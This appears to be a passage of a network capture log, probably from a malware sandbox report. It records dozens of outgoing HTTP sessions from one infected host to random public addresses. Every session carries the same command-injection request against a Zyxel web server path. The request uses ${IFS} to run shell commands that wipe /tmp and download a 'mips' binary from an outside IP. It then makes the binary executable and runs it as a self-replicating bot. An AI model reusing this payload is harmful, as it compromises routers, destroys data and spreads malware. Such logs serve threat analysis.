                              Mar 31, 2024 08:41:10.598053932 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1733192.168.2.135861473.106.189.235443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.598074913 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1734192.168.2.134600875.88.175.169443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.598114967 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1735192.168.2.1348186184.255.81.20443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.598159075 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1736192.168.2.134761685.27.172.51443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.598193884 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1737192.168.2.133486252.169.18.20443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.598226070 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1738192.168.2.135770089.200.219.106443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.598262072 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1739192.168.2.1353324160.106.166.55443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.598310947 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1740192.168.2.13403064.114.117.100443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.598359108 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1741192.168.2.135579695.74.232.74443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.598392010 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1742192.168.2.1355078108.196.201.188443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.598413944 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1743192.168.2.134466862.148.241.156443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.598459005 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1744192.168.2.133797681.250.200.36443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.598496914 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1745192.168.2.1340592221.10.16.6443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.598505020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1746192.168.2.134385445.229.32.54443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.598562002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1747192.168.2.1356534113.169.213.158443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.598607063 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1748192.168.2.1347108122.233.0.143443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.598633051 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1749192.168.2.135954218.73.122.12443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.598680973 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1750192.168.2.1343520108.78.44.249443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.598705053 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1751192.168.2.1336478201.115.169.52443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.598764896 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1752192.168.2.134119253.222.26.167443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.598798990 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1753192.168.2.133571260.8.130.53443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.598834038 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1754192.168.2.1359124109.237.219.141443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.598871946 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1755192.168.2.1348106117.123.241.175443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.598893881 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1756192.168.2.135687680.215.149.199443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.598947048 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1757192.168.2.1346680212.64.171.144443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.598965883 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1758192.168.2.135995057.42.143.91443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.599018097 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1759192.168.2.1345510173.10.146.199443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.599072933 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1760192.168.2.135424439.217.169.151443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.599107981 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1761192.168.2.1353530196.192.61.236443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.599136114 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1762192.168.2.1351934207.249.195.8443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.599157095 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1763192.168.2.1333348221.126.27.248443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.599194050 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1764192.168.2.13377004.112.174.4443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.599266052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1765192.168.2.1356616211.122.159.136443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.599298000 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1766192.168.2.1344108219.112.217.91443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.599344015 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1767192.168.2.135571297.1.137.253443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.599378109 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1768192.168.2.1345110157.17.232.160443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.599405050 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1769192.168.2.1352012172.108.1.187443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.599452019 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1770192.168.2.1355508217.231.88.79443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.599504948 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1771192.168.2.134782065.14.45.52443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.599536896 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1772192.168.2.1333840144.181.158.230443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.599582911 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1773192.168.2.1357904124.209.227.147443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.599608898 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1774192.168.2.135453837.146.40.70443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.599667072 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1775192.168.2.1353496142.254.241.150443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.599704027 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1776192.168.2.134185071.178.59.230443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.599749088 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1777192.168.2.133851693.228.207.15443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.599776030 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1778192.168.2.13524541.87.44.168443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.599826097 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1779192.168.2.1349078176.98.125.127443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.599862099 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1780192.168.2.134534862.12.213.88443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.599896908 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1781192.168.2.135040860.186.199.242443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.599935055 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1782192.168.2.134323860.28.245.251443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.599977970 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1783192.168.2.1337050172.138.213.100443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.600003004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1784192.168.2.1358690154.204.97.51443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.600055933 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1785192.168.2.1339632115.235.38.82443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.600080013 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1786192.168.2.1340248101.182.151.174443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.600152969 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1787192.168.2.135131250.189.223.104443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.600183964 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1788192.168.2.1354648188.238.68.41443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.600220919 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1789192.168.2.1347866203.229.27.38443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.600235939 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1790192.168.2.1355770199.249.107.171443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.600290060 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1791192.168.2.1354228134.21.43.137443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.600331068 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1792192.168.2.135408484.140.206.254443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.600378036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1793192.168.2.133901065.249.161.19443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.600416899 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1794192.168.2.1347992149.106.174.133443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.600449085 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1795192.168.2.135732298.239.151.225443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.600482941 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1796192.168.2.135611249.5.3.95443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.600537062 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1797192.168.2.1349210147.173.190.183443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.600565910 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1798192.168.2.135712892.123.234.35443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.600596905 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1799192.168.2.135134489.45.36.207443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.600671053 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1800192.168.2.1333456164.155.26.180443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.600713015 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1801192.168.2.1358964173.75.69.118443
                              TimestampBytes transferredDirectionData
